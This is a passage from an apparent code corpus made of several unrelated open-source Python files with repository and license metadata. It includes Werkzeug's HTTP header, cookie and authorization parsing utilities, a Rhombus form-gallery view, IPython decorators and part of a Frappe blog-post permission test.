epilog = "AWS credentials follow the Boto standard. See " +
"http://docs.pythonboto.org/en/latest/boto_config_tut.html. " +
"For example, you can populate AWS_ACCESS_KEY_ID and " +
"AWS_SECRET_ACCESS_KEY with your credentials, or use IAM " +
"role-based authentication (in which case you need not do " +
"anything).")
parser.add_argument("user_file", metavar="USER_FILE",
help="The user yaml file. See example_users.yml for an example.")
parser.add_argument("--dry-run",
action='store_true',
dest="dry_run",
help="Dry run mode. Do not commit any changes.",
default=False)
args = parser.parse_args()
users, groups, route53_zone, hesiod_domain = load_data(args.user_file)
sync(users, groups, route53_zone, hesiod_domain, args.dry_run)
print "Done!"
if __name__ == "__main__":
main()
|
mit
|
sk-yoh/qiaoy-byte
|
lib/werkzeug/http.py
|
317
|
33404
|
# -*- coding: utf-8 -*-
"""
werkzeug.http
~~~~~~~~~~~~~
Werkzeug comes with a bunch of utilities that help Werkzeug to deal with
HTTP data. Most of the classes and functions provided by this module are
used by the wrappers, but they are useful on their own, too, especially if
the response and request objects are not used.
This covers some of the more HTTP centric features of WSGI, some other
utilities such as cookie handling are documented in the `werkzeug.utils`
module.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import re
from time import time, gmtime
try:
from email.utils import parsedate_tz
except ImportError: # pragma: no cover
from email.Utils import parsedate_tz
try:
from urllib2 import parse_http_list as _parse_list_header
except ImportError: # pragma: no cover
from urllib.request import parse_http_list as _parse_list_header
from datetime import datetime, timedelta
from hashlib import md5
import base64
from werkzeug._internal import _cookie_quote, _make_cookie_domain, \
_cookie_parse_impl
from werkzeug._compat import to_unicode, iteritems, text_type, \
string_types, try_coerce_native, to_bytes, PY2, \
integer_types
# incorrect
_cookie_charset = 'latin1'
_accept_re = re.compile(r'([^\s;,]+)(?:[^,]*?;\s*q=(\d*(?:\.\d+)?))?')
_token_chars = frozenset("!#$%&'*+-.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
'^_`abcdefghijklmnopqrstuvwxyz|~')
_etag_re = re.compile(r'([Ww]/)?(?:"(.*?)"|(.*?))(?:\s*,\s*|$)')
_unsafe_header_chars = set('()<>@,;:\"/[]?={} \t')
_quoted_string_re = r'"[^"\\]*(?:\\.[^"\\]*)*"'
_option_header_piece_re = re.compile(r';\s*(%s|[^\s;=]+)\s*(?:=\s*(%s|[^;]+))?\s*' %
(_quoted_string_re, _quoted_string_re))
_entity_headers = frozenset([
'allow', 'content-encoding', 'content-language', 'content-length',
'content-location', 'content-md5', 'content-range', 'content-type',
'expires', 'last-modified'
])
_hop_by_hop_headers = frozenset([
'connection', 'keep-alive', 'proxy-authenticate',
'proxy-authorization', 'te', 'trailer', 'transfer-encoding',
'upgrade'
])
HTTP_STATUS_CODES = {
100: 'Continue',
101: 'Switching Protocols',
102: 'Processing',
200: 'OK',
201: 'Created',
202: 'Accepted',
203: 'Non Authoritative Information',
204: 'No Content',
205: 'Reset Content',
206: 'Partial Content',
207: 'Multi Status',
226: 'IM Used', # see RFC 3229
300: 'Multiple Choices',
301: 'Moved Permanently',
302: 'Found',
303: 'See Other',
304: 'Not Modified',
305: 'Use Proxy',
307: 'Temporary Redirect',
400: 'Bad Request',
401: 'Unauthorized',
402: 'Payment Required', # unused
403: 'Forbidden',
404: 'Not Found',
405: 'Method Not Allowed',
406: 'Not Acceptable',
407: 'Proxy Authentication Required',
408: 'Request Timeout',
409: 'Conflict',
410: 'Gone',
411: 'Length Required',
412: 'Precondition Failed',
413: 'Request Entity Too Large',
414: 'Request URI Too Long',
415: 'Unsupported Media Type',
416: 'Requested Range Not Satisfiable',
417: 'Expectation Failed',
418: 'I\'m a teapot', # see RFC 2324
422: 'Unprocessable Entity',
423: 'Locked',
424: 'Failed Dependency',
426: 'Upgrade Required',
428: 'Precondition Required', # see RFC 6585
429: 'Too Many Requests',
431: 'Request Header Fields Too Large',
449: 'Retry With', # proprietary MS extension
500: 'Internal Server Error',
501: 'Not Implemented',
502: 'Bad Gateway',
503: 'Service Unavailable',
504: 'Gateway Timeout',
505: 'HTTP Version Not Supported',
507: 'Insufficient Storage',
510: 'Not Extended'
}
def wsgi_to_bytes(data):
"""coerce wsgi unicode represented bytes to real ones
"""
if isinstance(data, bytes):
return data
return data.encode('latin1') #XXX: utf8 fallback?
def bytes_to_wsgi(data):
assert isinstance(data, bytes), 'data must be bytes'
if isinstance(data, str):
return data
else:
return data.decode('latin1')
def quote_header_value(value, extra_chars='', allow_token=True):
"""Quote a header value if necessary.
.. versionadded:: 0.5
:param value: the value to quote.
:param extra_chars: a list of extra characters to skip quoting.
:param allow_token: if this is enabled token values are returned
unchanged.
"""
if isinstance(value, bytes):
value = bytes_to_wsgi(value)
value = str(value)
if allow_token:
token_chars = _token_chars | set(extra_chars)
if set(value).issubset(token_chars):
return value
return '"%s"' % value.replace('\\', '\\\\').replace('"', '\\"')
def unquote_header_value(value, is_filename=False):
r"""Unquotes a header value. (Reversal of :func:`quote_header_value`).
This does not implement the real RFC unquoting, but mimics what
browsers actually do when quoting.
.. versionadded:: 0.5
:param value: the header value to unquote.
"""
if value and value[0] == value[-1] == '"':
# this is not the real unquoting, but fixing this so that the
# RFC is met will result in bugs with internet explorer and
# probably some other browsers as well. IE for example is
# uploading files with "C:\foo\bar.txt" as filename
value = value[1:-1]
# if this is a filename and the starting characters look like
# a UNC path, then just return the value without quotes. Using the
# replace sequence below on a UNC path has the effect of turning
# the leading double slash into a single slash and then
# _fix_ie_filename() doesn't work correctly. See #458.
if not is_filename or value[:2] != '\\\\':
return value.replace('\\\\', '\\').replace('\\"', '"')
return value
def dump_options_header(header, options):
"""The reverse function to :func:`parse_options_header`.
:param header: the header to dump
:param options: a dict of options to append.
"""
segments = []
if header is not None:
segments.append(header)
for key, value in iteritems(options):
if value is None:
segments.append(key)
else:
segments.append('%s=%s' % (key, quote_header_value(value)))
return '; '.join(segments)
def dump_header(iterable, allow_token=True):
"""Dump an HTTP header again. This is the reversal of
:func:`parse_list_header`, :func:`parse_set_header` and
:func:`parse_dict_header`. This also quotes strings that include an
equals sign unless you pass it as dict of key, value pairs.
>>> dump_header({'foo': 'bar baz'})
'foo="bar baz"'
>>> dump_header(('foo', 'bar baz'))
'foo, "bar baz"'
:param iterable: the iterable or dict of values to quote.
:param allow_token: if set to `False` tokens as values are disallowed.
See :func:`quote_header_value` for more details.
"""
if isinstance(iterable, dict):
items = []
for key, value in iteritems(iterable):
if value is None:
items.append(key)
else:
items.append('%s=%s' % (
key,
quote_header_value(value, allow_token=allow_token)
))
else:
items = [quote_header_value(x, allow_token=allow_token)
for x in iterable]
return ', '.join(items)
def parse_list_header(value):
"""Parse lists as described by RFC 2068 Section 2.
In particular, parse comma-separated lists where the elements of
the list may include quoted-strings. A quoted-string could
contain a comma. A non-quoted string could have quotes in the
middle. Quotes are removed automatically after parsing.
It basically works like :func:`parse_set_header` just that items
may appear multiple times and case sensitivity is preserved.
The return value is a standard :class:`list`:
>>> parse_list_header('token, "quoted value"')
['token', 'quoted value']
To create a header from the :class:`list` again, use the
:func:`dump_header` function.
:param value: a string with a list header.
:return: :class:`list`
"""
result = []
for item in _parse_list_header(value):
if item[:1] == item[-1:] == '"':
item = unquote_header_value(item[1:-1])
result.append(item)
return result
def parse_dict_header(value, cls=dict):
"""Parse lists of key, value pairs as described by RFC 2068 Section 2 and
convert them into a python dict (or any other mapping object created from
the type with a dict-like interface provided by the `cls` argument):
>>> d = parse_dict_header('foo="is a fish", bar="as well"')
>>> type(d) is dict
True
>>> sorted(d.items())
[('bar', 'as well'), ('foo', 'is a fish')]
If there is no value for a key it will be `None`:
>>> parse_dict_header('key_without_value')
{'key_without_value': None}
To create a header from the :class:`dict` again, use the
:func:`dump_header` function.
.. versionchanged:: 0.9
Added support for `cls` argument.
:param value: a string with a dict header.
:param cls: callable to use for storage of parsed results.
:return: an instance of `cls`
"""
result = cls()
if not isinstance(value, text_type):
#XXX: validate
value = bytes_to_wsgi(value)
for item in _parse_list_header(value):
if '=' not in item:
result[item] = None
continue
name, value = item.split('=', 1)
if value[:1] == value[-1:] == '"':
value = unquote_header_value(value[1:-1])
result[name] = value
return result
def parse_options_header(value):
"""Parse a ``Content-Type`` like header into a tuple with the content
type and the options:
>>> parse_options_header('text/html; charset=utf8')
('text/html', {'charset': 'utf8'})
This should not be used to parse ``Cache-Control`` like headers that use
a slightly different format. For these headers use the
:func:`parse_dict_header` function.
.. versionadded:: 0.5
:param value: the header to parse.
:return: (str, options)
"""
def _tokenize(string):
for match in _option_header_piece_re.finditer(string):
key, value = match.groups()
key = unquote_header_value(key)
if value is not None:
value = unquote_header_value(value, key == 'filename')
yield key, value
if not value:
return '', {}
parts = _tokenize(';' + value)
name = next(parts)[0]
extra = dict(parts)
return name, extra
def parse_accept_header(value, cls=None):
"""Parses an HTTP Accept-* header. This does not implement a complete
valid algorithm but one that supports at least value and quality
extraction.
Returns a new :class:`Accept` object (basically a list of ``(value, quality)``
tuples sorted by the quality with some additional accessor methods).
The second parameter can be a subclass of :class:`Accept` that is created
with the parsed values and returned.
:param value: the accept header string to be parsed.
:param cls: the wrapper class for the return value (can be
:class:`Accept` or a subclass thereof)
:return: an instance of `cls`.
"""
if cls is None:
cls = Accept
if not value:
return cls(None)
result = []
for match in _accept_re.finditer(value):
quality = match.group(2)
if not quality:
quality = 1
else:
quality = max(min(float(quality), 1), 0)
result.append((match.group(1), quality))
return cls(result)
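# Illustrative example; `best` is one of the accessor methods on the
# returned Accept object:
#   >>> accept = parse_accept_header('text/html,application/xml;q=0.9')
#   >>> accept.best
#   'text/html'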
def parse_cache_control_header(value, on_update=None, cls=None):
"""Parse a cache control header. The RFC differs between response and
request cache control, this method does not. It's your responsibility
to not use the wrong control statements.
.. versionadded:: 0.5
The `cls` was added. If not specified an immutable
:class:`~werkzeug.datastructures.RequestCacheControl` is returned.
:param value: a cache control header to be parsed.
:param on_update: an optional callable that is called every time a value
on the :class:`~werkzeug.datastructures.CacheControl`
object is changed.
:param cls: the class for the returned object. By default
:class:`~werkzeug.datastructures.RequestCacheControl` is used.
:return: a `cls` object.
"""
if cls is None:
cls = RequestCacheControl
if not value:
return cls(None, on_update)
return cls(parse_dict_header(value), on_update)
def parse_set_header(value, on_update=None):
"""Parse a set-like header and return a
:class:`~werkzeug.datastructures.HeaderSet` object:
>>> hs = parse_set_header('token, "quoted value"')
The return value is an object that treats the items case-insensitively
and keeps the order of the items:
>>> 'TOKEN' in hs
True
>>> hs.index('quoted value')
1
>>> hs
HeaderSet(['token', 'quoted value'])
To create a header from the :class:`HeaderSet` again, use the
:func:`dump_header` function.
:param value: a set header to be parsed.
:param on_update: an optional callable that is called every time a
value on the :class:`~werkzeug.datastructures.HeaderSet`
object is changed.
:return: a :class:`~werkzeug.datastructures.HeaderSet`
"""
if not value:
return HeaderSet(None, on_update)
return HeaderSet(parse_list_header(value), on_update)
def parse_authorization_header(value):
"""Parse an HTTP basic/digest authorization header transmitted by the web
browser. The return value is either `None` if the header was invalid or
not given, otherwise an :class:`~werkzeug.datastructures.Authorization`
object.
:param value: the authorization header to parse.
:return: a :class:`~werkzeug.datastructures.Authorization` object or `None`.
"""
if not value:
return
value = wsgi_to_bytes(value)
try:
auth_type, auth_info = value.split(None, 1)
auth_type = auth_type.lower()
except ValueError:
return
if auth_type == b'basic':
try:
username, password = base64.b64decode(auth_info).split(b':', 1)
except Exception as e:
return
return Authorization('basic', {'username': bytes_to_wsgi(username),
'password': bytes_to_wsgi(password)})
elif auth_type == b'digest':
auth_map = parse_dict_header(auth_info)
for key in 'username', 'realm', 'nonce', 'uri', 'response':
if not key in auth_map:
return
if 'qop' in auth_map:
if not auth_map.get('nc') or not auth_map.get('cnonce'):
return
return Authorization('digest', auth_map)
def parse_www_authenticate_header(value, on_update=None):
"""Parse an HTTP WWW-Authenticate header into a
:class:`~werkzeug.datastructures.WWWAuthenticate` object.
:param value: a WWW-Authenticate header to parse.
:param on_update: an optional callable that is called every time a value
on the :class:`~werkzeug.datastructures.WWWAuthenticate`
object is changed.
:return: a :class:`~werkzeug.datastructures.WWWAuthenticate` object.
"""
if not value:
return WWWAuthenticate(on_update=on_update)
try:
auth_type, auth_info = value.split(None, 1)
auth_type = auth_type.lower()
except (ValueError, AttributeError):
return WWWAuthenticate(value.strip().lower(), on_update=on_update)
return WWWAuthenticate(auth_type, parse_dict_header(auth_info),
on_update)
def parse_if_range_header(value):
"""Parses an if-range header which can be an etag or a date. Returns
a :class:`~werkzeug.datastructures.IfRange` object.
.. versionadded:: 0.7
"""
if not value:
return IfRange()
date = parse_date(value)
if date is not None:
return IfRange(date=date)
# drop weakness information
return IfRange(unquote_etag(value)[0])
def parse_range_header(value, make_inclusive=True):
"""Parses a range header into a :class:`~werkzeug.datastructures.Range`
object. If the header is missing or malformed `None` is returned.
`ranges` is a list of ``(start, stop)`` tuples where the ranges are
non-inclusive.
.. versionadded:: 0.7
"""
if not value or '=' not in value:
return None
ranges = []
last_end = 0
units, rng = value.split('=', 1)
units = units.strip().lower()
for item in rng.split(','):
item = item.strip()
if '-' not in item:
return None
if item.startswith('-'):
if last_end < 0:
return None
begin = int(item)
end = None
last_end = -1
elif '-' in item:
begin, end = item.split('-', 1)
begin = int(begin)
if begin < last_end or last_end < 0:
return None
if end:
end = int(end) + 1
if begin >= end:
return None
else:
end = None
last_end = end
ranges.append((begin, end))
return Range(units, ranges)
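# Illustrative example (stop values are exclusive after the +1 above;
# an open-ended range keeps None as its stop):
#   >>> rng = parse_range_header('bytes=0-499,1000-')
#   >>> rng.units, rng.ranges
#   ('bytes', [(0, 500), (1000, None)])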
def parse_content_range_header(value, on_update=None):
"""Parses a range header into a
:class:`~werkzeug.datastructures.ContentRange` object or `None` if
parsing is not possible.
.. versionadded:: 0.7
:param value: a content range header to be parsed.
:param on_update: an optional callable that is called every time a value
on the :class:`~werkzeug.datastructures.ContentRange`
object is changed.
"""
if value is None:
return None
try:
units, rangedef = (value or '').strip().split(None, 1)
except ValueError:
return None
if '/' not in rangedef:
return None
rng, length = rangedef.split('/', 1)
if length == '*':
length = None
elif length.isdigit():
length = int(length)
else:
return None
if rng == '*':
return ContentRange(units, None, None, length, on_update=on_update)
elif '-' not in rng:
return None
start, stop = rng.split('-', 1)
try:
start = int(start)
stop = int(stop) + 1
except ValueError:
return None
if is_byte_range_valid(start, stop, length):
return ContentRange(units, start, stop, length, on_update=on_update)
def quote_etag(etag, weak=False):
"""Quote an etag.
:param etag: the etag to quote.
:param weak: set to `True` to tag it "weak".
"""
if '"' in etag:
raise ValueError('invalid etag')
etag = '"%s"' % etag
if weak:
etag = 'w/' + etag
return etag
def unquote_etag(etag):
"""Unquote a single etag:
>>> unquote_etag('w/"bar"')
('bar', True)
>>> unquote_etag('"bar"')
('bar', False)
:param etag: the etag identifier to unquote.
:return: a ``(etag, weak)`` tuple.
"""
if not etag:
return None, None
etag = etag.strip()
weak = False
if etag[:2] in ('w/', 'W/'):
weak = True
etag = etag[2:]
if etag[:1] == etag[-1:] == '"':
etag = etag[1:-1]
return etag, weak
def parse_etags(value):
"""Parse an etag header.
:param value: the tag header to parse
:return: an :class:`~werkzeug.datastructures.ETags` object.
"""
if not value:
return ETags()
strong = []
weak = []
end = len(value)
pos = 0
while pos < end:
match = _etag_re.match(value, pos)
if match is None:
break
is_weak, quoted, raw = match.groups()
if raw == '*':
return ETags(star_tag=True)
elif quoted:
raw = quoted
if is_weak:
weak.append(raw)
else:
strong.append(raw)
pos = match.end()
return ETags(strong, weak)
def generate_etag(data):
"""Generate an etag for some data."""
return md5(data).hexdigest()
def parse_date(value):
"""Parse one of the following date formats into a datetime object:
.. sourcecode:: text
Sun, 06 Nov 1994 08:49:37 GMT ; RFC 822, updated by RFC 1123
Sunday, 06-Nov-94 08:49:37 GMT ; RFC 850, obsoleted by RFC 1036
Sun Nov 6 08:49:37 1994 ; ANSI C's asctime() format
If parsing fails the return value is `None`.
:param value: a string with a supported date format.
:return: a :class:`datetime.datetime` object.
"""
if value:
t = parsedate_tz(value.strip())
if t is not None:
try:
year = t[0]
# unfortunately that function does not tell us if two digit
# years were part of the string, or if they were prefixed
# with two zeroes. So what we do is to assume that 69-99
# refer to 1900, and everything below to 2000
if year >= 0 and year <= 68:
year += 2000
elif year >= 69 and year <= 99:
year += 1900
return datetime(*((year,) + t[1:7])) - \
timedelta(seconds=t[-1] or 0)
except (ValueError, OverflowError):
return None
def _dump_date(d, delim):
"""Used for `http_date` and `cookie_date`."""
if d is None:
d = gmtime()
elif isinstance(d, datetime):
d = d.utctimetuple()
elif isinstance(d, (integer_types, float)):
d = gmtime(d)
return '%s, %02d%s%s%s%s %02d:%02d:%02d GMT' % (
('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun')[d.tm_wday],
d.tm_mday, delim,
('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep',
'Oct', 'Nov', 'Dec')[d.tm_mon - 1],
delim, str(d.tm_year), d.tm_hour, d.tm_min, d.tm_sec
)
def cookie_date(expires=None):
"""Formats the time to ensure compatibility with Netscape's cookie
standard.
Accepts a floating point number expressed in seconds since the epoch, a
datetime object or a timetuple. All times in UTC. The :func:`parse_date`
function can be used to parse such a date.
Outputs a string in the format ``Wdy, DD-Mon-YYYY HH:MM:SS GMT``.
:param expires: If provided that date is used, otherwise the current.
"""
return _dump_date(expires, '-')
def http_date(timestamp=None):
"""Formats the time to match the RFC1123 date format.
Accepts a floating point number expressed in seconds since the epoch, a
datetime object or a timetuple. All times in UTC. The :func:`parse_date`
function can be used to parse such a date.
Outputs a string in the format ``Wdy, DD Mon YYYY HH:MM:SS GMT``.
:param timestamp: If provided that date is used, otherwise the current.
"""
return _dump_date(timestamp, ' ')
def is_resource_modified(environ, etag=None, data=None, last_modified=None):
"""Convenience method for conditional requests.
:param environ: the WSGI environment of the request to be checked.
:param etag: the etag for the response for comparison.
:param data: or alternatively the data of the response to automatically
generate an etag using :func:`generate_etag`.
:param last_modified: an optional date of the last modification.
:return: `True` if the resource was modified, otherwise `False`.
"""
if etag is None and data is not None:
etag = generate_etag(data)
elif data is not None:
raise TypeError('both data and etag given')
if environ['REQUEST_METHOD'] not in ('GET', 'HEAD'):
return False
unmodified = False
if isinstance(last_modified, string_types):
last_modified = parse_date(last_modified)
# ensure that microsecond is zero because the HTTP spec does not transmit
# that either and we might have some false positives. See issue #39
if last_modified is not None:
last_modified = last_modified.replace(microsecond=0)
modified_since = parse_date(environ.get('HTTP_IF_MODIFIED_SINCE'))
if modified_since and last_modified and last_modified <= modified_since:
unmodified = True
if etag:
if_none_match = parse_etags(environ.get('HTTP_IF_NONE_MATCH'))
if if_none_match:
unmodified = if_none_match.contains_raw(etag)
return not unmodified
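# Minimal sketch with a hand-built WSGI environ (hypothetical etag):
#   >>> env = {'REQUEST_METHOD': 'GET', 'HTTP_IF_NONE_MATCH': '"abc"'}
#   >>> is_resource_modified(env, etag='abc')
#   False
#   >>> is_resource_modified({'REQUEST_METHOD': 'GET'}, etag='abc')
#   True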
def remove_entity_headers(headers, allowed=('expires', 'content-location')):
"""Remove all entity headers from a list or :class:`Headers` object. This
operation works in-place. `Expires` and `Content-Location` headers are
by default not removed. The reason for this is :rfc:`2616` section
10.3.5 which specifies some entity headers that should be sent.
.. versionchanged:: 0.5
added `allowed` parameter.
:param headers: a list or :class:`Headers` object.
:param allowed: a list of headers that should still be allowed even though
they are entity headers.
"""
allowed = set(x.lower() for x in allowed)
headers[:] = [(key, value) for key, value in headers if
not is_entity_header(key) or key.lower() in allowed]
def remove_hop_by_hop_headers(headers):
"""Remove all HTTP/1.1 "Hop-by-Hop" headers from a list or
:class:`Headers` object. This operation works in-place.
.. versionadded:: 0.5
:param headers: a list or :class:`Headers` object.
"""
headers[:] = [(key, value) for key, value in headers if
not is_hop_by_hop_header(key)]
def is_entity_header(header):
"""Check if a header is an entity header.
.. versionadded:: 0.5
:param header: the header to test.
:return: `True` if it's an entity header, `False` otherwise.
"""
return header.lower() in _entity_headers
def is_hop_by_hop_header(header):
"""Check if a header is an HTTP/1.1 "Hop-by-Hop" header.
.. versionadded:: 0.5
:param header: the header to test.
:return: `True` if it's an entity header, `False` otherwise.
"""
return header.lower() in _hop_by_hop_headers
def parse_cookie(header, charset='utf-8', errors='replace', cls=None):
"""Parse a cookie. Either from a string or WSGI environ.
Per default encoding errors are ignored. If you want a different behavior
you can set `errors` to ``'replace'`` or ``'strict'``. In strict mode a
:exc:`HTTPUnicodeError` is raised.
.. versionchanged:: 0.5
This function now returns a :class:`TypeConversionDict` instead of a
regular dict. The `cls` parameter was added.
:param header: the header to be used to parse the cookie. Alternatively
this can be a WSGI environment.
:param charset: the charset for the cookie values.
:param errors: the error behavior for the charset decoding.
:param cls: an optional dict class to use. If this is not specified
or `None` the default :class:`TypeConversionDict` is
used.
"""
if isinstance(header, dict):
header = header.get('HTTP_COOKIE', '')
elif header is None:
header = ''
# If the value is a unicode string it's mangled through latin1. This
# is done because per PEP 3333 on Python 3 all headers are assumed to be
# latin1, which however is incorrect for cookies, which are sent in the
# page encoding. As a result we re-encode to latin1 here and decode the
# individual values with the requested charset in _parse_pairs() below.
if isinstance(header, text_type):
header = header.encode('latin1', 'replace')
if cls is None:
cls = TypeConversionDict
def _parse_pairs():
for key, val in _cookie_parse_impl(header):
key = to_unicode(key, charset, errors, allow_none_charset=True)
val = to_unicode(val, charset, errors, allow_none_charset=True)
yield try_coerce_native(key), val
return cls(_parse_pairs())
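# Illustrative example (Python 3 repr shown):
#   >>> jar = parse_cookie('session=abc; lang=en')
#   >>> jar['lang']
#   'en'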
def dump_cookie(key, value='', max_age=None, expires=None, path='/',
domain=None, secure=False, httponly=False,
charset='utf-8', sync_expires=True):
"""Creates a new Set-Cookie header without the ``Set-Cookie`` prefix
The parameters are the same as in the cookie Morsel object in the
Python standard library but it accepts unicode data, too.
On Python 3 the return value of this function will be a unicode
string, on Python 2 it will be a native string. In both cases the
return value is usually restricted to ascii as the vast majority of
values are properly escaped, but that is no guarantee. If a unicode
string is returned it's tunneled through latin1 as required by
PEP 3333.
The return value is not ASCII safe if the key contains unicode
characters. This is technically against the specification but
happens in the wild. It's strongly recommended to not use
non-ASCII values for the keys.
:param max_age: should be a number of seconds, or `None` (default) if
the cookie should last only as long as the client's
browser session. Additionally `timedelta` objects
are accepted, too.
:param expires: should be a `datetime` object or unix timestamp.
:param path: limits the cookie to a given path, per default it will
span the whole domain.
:param domain: Use this if you want to set a cross-domain cookie. For
example, ``domain=".example.com"`` will set a cookie
that is readable by the domain ``www.example.com``,
``foo.example.com`` etc. Otherwise, a cookie will only
be readable by the domain that set it.
:param secure: The cookie will only be available via HTTPS
:param httponly: disallow JavaScript to access the cookie. This is an
extension to the cookie standard and probably not
supported by all browsers.
:param charset: the encoding for unicode values.
:param sync_expires: automatically set expires if max_age is defined
but expires not.
"""
key = to_bytes(key, charset)
value = to_bytes(value, charset)
if path is not None:
path = iri_to_uri(path, charset)
domain = _make_cookie_domain(domain)
if isinstance(max_age, timedelta):
max_age = (max_age.days * 60 * 60 * 24) + max_age.seconds
if expires is not None:
if not isinstance(expires, string_types):
expires = cookie_date(expires)
elif max_age is not None and sync_expires:
expires = to_bytes(cookie_date(time() + max_age))
buf = [key + b'=' + _cookie_quote(value)]
# XXX: In theory all of these parameters that are not marked with `None`
# should be quoted. Because stdlib did not quote it before I did not
# want to introduce quoting there now.
for k, v, q in ((b'Domain', domain, True),
(b'Expires', expires, False,),
(b'Max-Age', max_age, False),
(b'Secure', secure, None),
(b'HttpOnly', httponly, None),
(b'Path', path, False)):
if q is None:
if v:
buf.append(k)
continue
if v is None:
continue
tmp = bytearray(k)
if not isinstance(v, (bytes, bytearray)):
v = to_bytes(text_type(v), charset)
if q:
v = _cookie_quote(v)
tmp += b'=' + v
buf.append(bytes(tmp))
# The return value will be an incorrectly encoded latin1 header on
# Python 3 for consistency with the headers object and a bytestring
# on Python 2 because that's how the API makes more sense.
rv = b'; '.join(buf)
if not PY2:
rv = rv.decode('latin1')
return rv
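# Illustrative example (no max_age given, so no Expires is synthesized):
#   >>> dump_cookie('session', 'abc', httponly=True)
#   'session=abc; HttpOnly; Path=/'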
def is_byte_range_valid(start, stop, length):
"""Checks if a given byte content range is valid for the given length.
.. versionadded:: 0.7
"""
if (start is None) != (stop is None):
return False
elif start is None:
return length is None or length >= 0
elif length is None:
return 0 <= start < stop
elif start >= stop:
return False
return 0 <= start < length
# circular dependency fun
from werkzeug.datastructures import Accept, HeaderSet, ETags, Authorization, \
WWWAuthenticate, TypeConversionDict, IfRange, Range, ContentRange, \
RequestCacheControl
# DEPRECATED
# backwards compatible imports
from werkzeug.datastructures import MIMEAccept, CharsetAccept, \
LanguageAccept, Headers
from werkzeug.urls import iri_to_uri
|
apache-2.0
|
trmznt/rhombus
|
rhombus/views/gallery.py
|
1
|
2066
|
from rhombus.views import *
@roles( PUBLIC )
def index(request):
""" input tags gallery """
static = False
html = div( div(h3('Input Gallery')))
eform = form( name='rhombus/gallery', method=POST,
action='')
eform.add(
fieldset(
input_hidden(name='rhombus-gallery_id', value='00'),
input_text('rhombus-gallery_text', 'Text Field', value='Text field value'),
input_text('rhombus-gallery_static', 'Static Text Field', value='Text field static',
static=True),
input_textarea('rhombus-gallery_textarea', 'Text Area', value='A text in text area'),
input_select('rhombus-gallery_select', 'Select', value=2,
options = [ (1, 'Opt1'), (2, 'Opt2'), (3, 'Opt3') ]),
input_select('rhombus-gallery_select-multi', 'Select (Multiple)', value=[2,3],
options = [ (1, 'Opt1'), (2, 'Opt2'), (3, 'Opt3') ], multiple=True),
input_select('rhombus-gallery_select2', 'Select2 (Multiple)', value=[2,4],
options = [ (1, 'Opt1'), (2, 'Opt2'), (3, 'Opt3'), (4, 'Opt4'), (5, 'Opt5') ], multiple=True),
input_select('rhombus-gallery_select2-ajax', 'Select2 (AJAX)'),
checkboxes('rhombus-gallery_checkboxes', 'Check Boxes',
boxes = [ ('1', 'Box 1', True), ('2', 'Box 2', False), ('3', 'Box 3', True)]),
submit_bar(),
)
)
html.add( div(eform) )
code = '''
$('#rhombus-gallery_select2').select2();
$('#rhombus-gallery_select2-ajax').select2({
placeholder: 'Select from AJAX',
minimumInputLength: 3,
ajax: {
url: "%s",
dataType: 'json',
data: function(params) { return { q: params.term, g: "@ROLES" }; },
processResults: function(data, params) { return { results: data }; }
},
});
''' % request.route_url('rhombus.ek-lookup')
return render_to_response('rhombus:templates/generics/page.mako',
{ 'content': str(html), 'code': code },
request = request )
|
lgpl-3.0
|
lifeinoppo/littlefishlet-scode
|
RES/REF/python_sourcecode/ipython-master/IPython/utils/decorators.py
|
36
|
2071
|
# encoding: utf-8
"""Decorators that don't go anywhere else.
This module contains misc. decorators that don't really go with another module
in :mod:`IPython.utils`. Beore putting something here please see if it should
go into another topical module in :mod:`IPython.utils`.
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
def flag_calls(func):
"""Wrap a function to detect and flag when it gets called.
This is a decorator which takes a function and wraps it in a function with
a 'called' attribute. wrapper.called is initialized to False.
The wrapper.called attribute is set to False right before each call to the
wrapped function, so if the call fails it remains False. After the call
completes, wrapper.called is set to True and the output is returned.
Testing for truth in wrapper.called allows you to determine if a call to
func() was attempted and succeeded."""
# don't wrap twice
if hasattr(func, 'called'):
return func
def wrapper(*args,**kw):
wrapper.called = False
out = func(*args,**kw)
wrapper.called = True
return out
wrapper.called = False
wrapper.__doc__ = func.__doc__
return wrapper
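# Illustrative example:
#   >>> @flag_calls
#   ... def add(a, b): return a + b
#   >>> add.called
#   False
#   >>> add(1, 2)
#   3
#   >>> add.called
#   True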
def undoc(func):
"""Mark a function or class as undocumented.
This is found by inspecting the AST, so for now it must be used directly
as @undoc, not as e.g. @decorators.undoc
"""
return func
|
gpl-2.0
|
cadencewatches/frappe
|
frappe/website/doctype/blog_post/test_blog_post.py
|
1
|
5111
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
"""Use blog post test to test permission restriction logic"""
import frappe
import frappe.defaults
import unittest
from frappe.core.page.user_properties.user_properties import add, remove, get_properties, clear_restrictions
test_records = frappe.get_test_records('Blog Post')
test_dependencies = ["User"]
class TestBlogPost(unittest.TestCase):
def setUp(self):
frappe.db.sql("""update tabDocPerm set `restricted`=0 where parent='Blog Post'
and ifnull(permlevel,0)=0""")
frappe.db.sql("""update `tabBlog Post` set owner='test2@example.com'
where name='_test-blog-post'""")
frappe.clear_cache(doctype="Blog Post")
user = frappe.get_doc("User", "test1@example.com")
user.add_roles("Website Manager")
user = frappe.get_doc("User", "test2@example.com")
user.add_roles("Blogger")
frappe.set_user("test1@example.com")
def tearDown(self):
frappe.set_user("Administrator")
clear_restrictions("Blog Category")
clear_restrictions("Blog Post")
def test_basic_permission(self):
post = frappe.get_doc("Blog Post", "_test-blog-post")
self.assertTrue(post.has_permission("read"))
def test_restriction_in_doc(self):
frappe.defaults.add_default("Blog Category", "_Test Blog Category 1", "test1@example.com",
"Restriction")
post = frappe.get_doc("Blog Post", "_test-blog-post")
self.assertFalse(post.has_permission("read"))
post1 = frappe.get_doc("Blog Post", "_test-blog-post-1")
self.assertTrue(post1.has_permission("read"))
def test_restriction_in_report(self):
frappe.defaults.add_default("Blog Category", "_Test Blog Category 1", "test1@example.com",
"Restriction")
